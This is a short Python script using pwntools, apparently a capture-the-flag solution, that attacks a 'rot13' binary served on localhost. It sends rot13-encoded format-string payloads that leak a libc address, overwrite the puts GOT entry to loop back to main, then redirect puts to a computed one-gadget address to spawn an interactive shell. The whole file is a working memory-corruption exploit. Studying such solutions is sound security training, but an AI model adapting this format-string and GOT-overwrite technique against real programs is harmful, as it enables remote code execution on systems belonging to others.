from pwn import *
import codecs

elf = ELF('rot13')
context.binary = elf
s = remote('localhost', 10004)

def rot13(s):
  s = s.decode('latin-1')
  s = codecs.decode(s, 'rot13')
  s = s.encode('latin-1')
  return s

t = (
  b'%43$016lx_______'+
  fmtstr.fmtstr_payload(
    offset = 10,
    writes = {elf.got.puts: elf.symbols.main},
    numbwritten = 16+7))
s.sendline(rot13(t))

start_main = int(s.recv(16), 16)
rce = start_main - 0x270b3 + 0xe6af1

t = fmtstr.fmtstr_payload(
  offset = 8,
  writes = {elf.got.puts: rce})
s.sendline(rot13(t))

s.interactive()